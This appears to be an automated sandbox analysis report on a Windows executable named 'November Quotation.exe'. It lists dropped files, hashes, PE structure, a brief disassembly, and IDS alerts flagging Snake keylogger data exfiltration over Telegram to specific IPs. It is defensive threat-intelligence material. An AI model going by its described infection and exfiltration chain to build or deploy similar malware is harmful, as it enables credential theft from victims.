| SHA-512: | F8861A0F3D643130172474B55A05ED442144C897934EB330203910BA408D2714AB86D05044CCB402B3504461F5743676DEC0A7DB4CFF1E6455805615A5C35D64 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 778344 |
| Entropy (8bit): | 7.97640116034132 |
| Encrypted: | false |
| SSDEEP: | 12288:rI9y5EG2ab+ek+FWcHng0zChAFzDr1/RvK4f6efLIyc/QAIMOms+xwptpXhX51H/:JVxfHWeg0zPzN/R/6MIVHIRZtphp1H/ |
| MD5: | EBFE0469CA7E7A5CA4957B72BF4B1A48 |
| SHA1: | A5ABD780240905F85846A2EB91B17FFBFED640AB |
| SHA-256: | 5D68FC50B0A3CEF7ACCABD9C3195998C04A0ADAE0A7E8B3FAC3881F5C5397305 |
| SHA-512: | F8215A057BCAC613C817D5837A3CCD249CDDAF8F8E355921D8F56A2D83CBDF0D0F22874F00DD0E5D640122CFBE8B3F7B79BCA440196DB54F0C861013C782D350 |
| Malicious: | true |
| Antivirus: |
|
| Preview: |
C:\Users\user\AppData\Local\sognenes\iconograph\Folkways\November Quotation.exe:Zone.Identifier 
Download File
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 26 |
| Entropy (8bit): | 3.95006375643621 |
| Encrypted: | false |
| SSDEEP: | 3:ggPYV:rPYV |
| MD5: | 187F488E27DB4AF347237FE461A079AD |
| SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
| SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
| SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
| Malicious: | true |
| Preview: |
| Process: | C:\Users\user\Desktop\November Quotation.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 419440 |
| Entropy (8bit): | 1.2480722763583403 |
| Encrypted: | false |
| SSDEEP: | 1536:4BwK0Pb9vPh5wDlFliMx5mJhqxVcOyVQvXFLYV:6Iz9H4D4Mx5Wh4HzGV |
| MD5: | F53585FFDD1E9FD890FDA7C8760B4765 |
| SHA1: | C835F9A0A67B77A2D671A7A04BEA8CE810307850 |
| SHA-256: | D95B9B8EBE45ED0AACD94595297C6155D6EAE9CA57EA4B5E586513A3628AFDB1 |
| SHA-512: | 38ABCA14F2B6874C66235EF08EDA10327D2A58769D122AA164A4A1A86FE3D966D0F7AEA554E6315157DC80A72E4156F6A4CD1452DC5F3D2CED3F7D407772ECFF |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\November Quotation.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 330846 |
| Entropy (8bit): | 1.260352790698924 |
| Encrypted: | false |
| SSDEEP: | 768:tJCG3Zp6ICBp3uKWDL9e7LZSQvwthb++dk5MJKUe4ZCGKtnyuwvKZGye8HBdEmTN:tJ3u2two+KyomXrv4BxnU7cjkE+8 |
| MD5: | F3705D740DCA8D46B5A48D60C835E2A1 |
| SHA1: | 9E80CF8669C2A6680BE5AEEE5E84B7BFB55E04E3 |
| SHA-256: | 87B08EA9D89BC023BE4A6CEF3CA5B74DAC237A35173651C31E8B19062C427064 |
| SHA-512: | 6C5B39CCBA3D187DBC2CD14620CBDE9BDC778CC59CF96C5F8900B3CC40099A0C66E7ECB5CD30203A7D71BF183F9B2E49BB582A632AE12CF94A62232548D4687C |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\November Quotation.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 498 |
| Entropy (8bit): | 4.3054308720223355 |
| Encrypted: | false |
| SSDEEP: | 12:qzp84ke8uH/7LIAwsL009wHT9vlrbUoiNbixsjGC7H/H/rTA:qAhuH/Pr0qwxvBUnqbGHA |
| MD5: | DEE6FD93E40102A2D88FBD1EB620D5AE |
| SHA1: | 0FBBCCA4BC3A63D6483705F71A1248B9E9C0E731 |
| SHA-256: | 653C71C641347ED4C3A1F887914AE2DC458D188DAAA9BA78BD6847C10F7991F9 |
| SHA-512: | E1DC9F48BF9DF764A8C1EEFC5F207055EC1D607C186C54FE17DDCB6F123627D688499C104B0B470B437B5A0F711474EBB30FF10BD275C2B5209958D2496B3668 |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\November Quotation.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 400041 |
| Entropy (8bit): | 1.2584780109276614 |
| Encrypted: | false |
| SSDEEP: | 1536:PZ3YIEY5YqtG8iK71hNbof463B02ddipw:h3dt5jG8iK7Rbonx0A |
| MD5: | 08153E7C8C786458C9204FA5AB05DA6F |
| SHA1: | 2D0DE2FFB4D2B4B32239B238A7F2F4DEAE6242B5 |
| SHA-256: | E1B321A718070E6BC55A2D09BA6458C315C3E2012D6CFC38FA706EAC714787B6 |
| SHA-512: | E37D596C5794820F25856AFBD00978E3BB85A726B84ED5BBD39514D73A2AEBCCC79E4F5F59E1F2B4DD42CCA97696762BFA88A9C1AC0427F6FF6268F977273A02 |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\November Quotation.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 380141 |
| Entropy (8bit): | 1.2574687741536028 |
| Encrypted: | false |
| SSDEEP: | 768:3vD0NBovaItxEQPmk6v4We0jR/yP8d9bOBhVceyrR9e2hHcrFiPSPDITvoS9EoCV:V2cUcRZ6NVCSnzxY9I54r2wlhTtcgD |
| MD5: | 678AE408AFCD33E6AB7E3407E8299900 |
| SHA1: | 4948239D5601EE3834D74E408BB216A2D7CDC5B3 |
| SHA-256: | 6DED8514E23407D3E6ABA312ECF511B304C20056DBF61B4411DD9289E3E38EC7 |
| SHA-512: | 3ED610200A030C2D260CC9CE1FD5AD314FAE7872B7B5128ECF9868EE95E06B8641DB8D8B296B0D64EF72AC872CB8AB673A5EC33786561B7562B4D2DDE9565778 |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\November Quotation.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 69718 |
| Entropy (8bit): | 5.2028812445345585 |
| Encrypted: | false |
| SSDEEP: | 1536:dCor2KyN7vv0sM4+dldM9VheYtL967zlTOlQ:dCoV4vxGlSVhVARClQ |
| MD5: | F1B47D3B2608577828342F5E8A7C9BF8 |
| SHA1: | 11AED67EF8C02835FBCDC4B90D4A3A23113EAF4C |
| SHA-256: | 54D3AB1EA222AB9A21976E86DFDD0340023E12D5CCE6107257BE8EEC589FED88 |
| SHA-512: | A3A58689EE9132DAB950524FF8F77BB96D9A9095EE4DA811BA8FD57E7D865F8D255F39F2486BCD6F61EDA96F882342DEF08171DD0DDAF2013C871FC9E809C59D |
| Malicious: | true |
| Preview: |
| Process: | C:\Users\user\Desktop\November Quotation.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 491235 |
| Entropy (8bit): | 1.2538765845677147 |
| Encrypted: | false |
| SSDEEP: | 1536:FawI4v7S6p/E5EU9JY0/pp/ML+TnDlimevo973PeAfw:FVY6+5jW0/ppk4kQ1WGw |
| MD5: | 62863D598F1A549DD404F0E847CB0E80 |
| SHA1: | 693CC97D03FC863A591453B9E56BB5ACCC8EE514 |
| SHA-256: | 30064BCF87470C975F5644266359199C88F648815297CA8784EDC68610C06794 |
| SHA-512: | 5C804A3D1CEC1E0669F3A0B02B09E3E4430659C217B4F15ECC6757818EF67DFD17655C8E7C49A5B56B01F13FB0BCD9D01670CF6E984E9491BF8B9698B5109CA9 |
| Malicious: | false |
| Preview: |
| File type: | |
| Entropy (8bit): | 7.97640116034132 |
| TrID: |
|
| File name: | November Quotation.exe |
| File size: | 778'344 bytes |
| MD5: | ebfe0469ca7e7a5ca4957b72bf4b1a48 |
| SHA1: | a5abd780240905f85846a2eb91b17ffbfed640ab |
| SHA256: | 5d68fc50b0a3cef7accabd9c3195998c04a0adae0a7e8b3fac3881f5c5397305 |
| SHA512: | f8215a057bcac613c817d5837a3ccd249cddaf8f8e355921d8f56a2d83cbdf0d0f22874f00dd0e5d640122cfbe8b3f7b79bca440196db54f0c861013c782d350 |
| SSDEEP: | 12288:rI9y5EG2ab+ek+FWcHng0zChAFzDr1/RvK4f6efLIyc/QAIMOms+xwptpXhX51H/:JVxfHWeg0zPzN/R/6MIVHIRZtphp1H/ |
| TLSH: | 12F4234979E0F935DE670F35F03254B58BD6E8587013AA07D7108E2A7A3E582E81F72B |
| File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................b..........)2............@ |
 | |
| Icon Hash: | 1f9706b9f9391b86 |
| Entrypoint: | 0x403229 |
| Entrypoint Section: | .text |
| Digitally signed: | true |
| Imagebase: | 0x400000 |
| Subsystem: | windows gui |
| Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
| DLL Characteristics: | TERMINAL_SERVER_AWARE |
| Time Stamp: | 0x52BA66B8 [Wed Dec 25 05:01:44 2013 UTC] |
| TLS Callbacks: | |
| CLR (.Net) Version: | |
| OS Version Major: | 4 |
| OS Version Minor: | 0 |
| File Version Major: | 4 |
| File Version Minor: | 0 |
| Subsystem Version Major: | 4 |
| Subsystem Version Minor: | 0 |
| Import Hash: | 7ed0d71376e55d58ab36dc7d3ffda898 |
| Signature Valid: | false |
| Signature Issuer: | CN=Schairerite, O=Schairerite, L=Patay, C=FR |
| Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
| Error Number: | -2146762487 |
| Not Before, Not After |
|
| Subject Chain |
|
| Version: | 3 |
| Thumbprint MD5: | 9C121656BA274DCAEC01A322F4D92C1A |
| Thumbprint SHA-1: | 70431CF42DF7266CCF860698503A7AD67801DE49 |
| Thumbprint SHA-256: | AFF12891F7C23E83D543816FAA2F72EC6F6380A169240865C2FD0EB223DB8399 |
| Serial: | 0D0275EA70BAB30B6D070F7111359FA500BBD8D1 |
| Instruction |
|---|
| sub esp, 000002D4h |
| push ebx |
| push ebp |
| push esi |
| push edi |
| push 00000020h |
| xor ebp, ebp |
| pop esi |
| mov dword ptr [esp+14h], ebp |
| mov dword ptr [esp+10h], 0040A2D8h |
| mov dword ptr [esp+1Ch], ebp |
| call dword ptr [00408034h] |
| push 00008001h |
| call dword ptr [00408134h] |
| push ebp |
| call dword ptr [004082ACh] |
| push 00000008h |
| mov dword ptr [00434F58h], eax |
| call 00007F1770D4C0A4h |
| mov dword ptr [00434EA4h], eax |
| push ebp |
| lea eax, dword ptr [esp+34h] |
| push 000002B4h |
| push eax |
| push ebp |
| push 0042B1B8h |
| call dword ptr [0040817Ch] |
| push 0040A2C0h |
| push 00433EA0h |
| call 00007F1770D4BD0Fh |
| call dword ptr [00408138h] |
| mov ebx, 0043F000h |
| push eax |
| push ebx |
| call 00007F1770D4BCFDh |
| push ebp |
| call dword ptr [0040810Ch] |
| cmp word ptr [0043F000h], 0022h |
| mov dword ptr [00434EA0h], eax |
| mov eax, ebx |
| jne 00007F1770D4920Ah |
| push 00000022h |
| mov eax, 0043F002h |
| pop esi |
| push esi |
| push eax |
| call 00007F1770D4B74Eh |
| push eax |
| call dword ptr [00408240h] |
| mov dword ptr [esp+18h], eax |
| jmp 00007F1770D492CEh |
| push 00000020h |
| pop edx |
| cmp cx, dx |
| jne 00007F1770D49209h |
| inc eax |
| inc eax |
| cmp word ptr [eax], dx |
| je 00007F1770D491FBh |
| add word ptr [eax], 0000h |
| Programming Language: |
|
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x85a0 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x65000 | 0x20b8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0xbd768 | 0x900 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x606c | 0x6200 | 6b261bd7f45c2df7de2d0134c84421b7 | False | 0.6672114158163265 | data | 6.457067985385169 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8000 | 0x1460 | 0x1600 | 0aa2dc336f7337ed3785ee2afeacae36 | False | 0.4211647727272727 | data | 4.945964880166059 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xa000 | 0x2af98 | 0x600 | 326f796323fdc724ea91090eafbe9bdc | False | 0.4856770833333333 | data | 3.795352750027872 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x35000 | 0x30000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x65000 | 0x20b8 | 0x2200 | 74b27a0083cbdcb566d993625801cb0e | False | 0.5340073529411765 | data | 4.938841517310863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x65208 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4608, resolution 2833 x 2833 px/m | English | United States | 0.5978490832157969 |
| RT_DIALOG | 0x66830 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x66930 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x66a50 | 0xc4 | data | English | United States | 0.5918367346938775 |
| RT_DIALOG | 0x66b18 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x66b78 | 0x14 | data | English | United States | 1.05 |
| RT_VERSION | 0x66b90 | 0x21c | data | English | United States | 0.5314814814814814 |
| RT_MANIFEST | 0x66db0 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984 |
| DLL | Import |
|---|---|
| KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte |
| USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
| ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
| VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States |  |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-25T13:47:31.093531+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49838 | 172.217.19.174 | 443 | TCP |
| 2024-11-25T13:47:38.326543+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49859 | 193.122.130.0 | 80 | TCP |
| 2024-11-25T13:47:40.889059+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49859 | 193.122.130.0 | 80 | TCP |
| 2024-11-25T13:47:43.098496+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49871 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:47:44.623459+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49877 | 193.122.130.0 | 80 | TCP |
| 2024-11-25T13:47:46.772175+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49881 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:47:50.431287+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49891 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:47:53.739392+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49902 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:47:57.177157+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49909 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:00.630012+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49921 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:04.249756+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49929 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:07.632635+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49940 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:10.896009+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49947 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:14.213747+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49958 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:17.661828+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49966 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:21.001411+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49977 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:24.453386+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49985 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:27.885837+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49996 | 149.154.167.220 | 443 | TCP |
| 2024-11-25T13:48:31.633855+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 50004 | 149.154.167.220 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Nov 25, 2024 13:47:28.464857101 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:28.464911938 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:28.465007067 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:28.489459991 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:28.489491940 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:30.185723066 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:30.185807943 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:30.186403990 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:30.186448097 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:30.239243031 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:30.239269018 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:30.239598989 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:30.239650965 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:30.242942095 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:30.287327051 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:31.093538046 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:31.093625069 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:31.093631029 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:31.093668938 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:31.094444036 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:31.094485044 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:31.094527006 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:31.094613075 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:31.096028090 CET | 49838 | 443 | 192.168.2.9 | 172.217.19.174 |
| Nov 25, 2024 13:47:31.096036911 CET | 443 | 49838 | 172.217.19.174 | 192.168.2.9 |
| Nov 25, 2024 13:47:31.366554976 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:31.366615057 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:31.366686106 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:31.367034912 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:31.367052078 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:33.119740009 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:33.119822979 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:33.123753071 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:33.123774052 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:33.124022961 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:33.124066114 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:33.124440908 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:33.167336941 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:35.787497997 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:35.787667036 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:35.800103903 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:35.800218105 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:35.906820059 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:35.907032967 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:35.907077074 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:35.907128096 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:35.910815954 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:35.910890102 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:35.987556934 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:35.987675905 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:35.989907026 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:35.989991903 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:35.998102903 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:35.998208046 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:35.998236895 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:35.998274088 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.006191969 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.006285906 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.008210897 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.008313894 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.016309023 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.016379118 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
| Nov 25, 2024 13:47:36.017641068 CET | 443 | 49848 | 142.250.181.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.017700911 CET | 49848 | 443 | 192.168.2.9 | 142.250.181.1 |
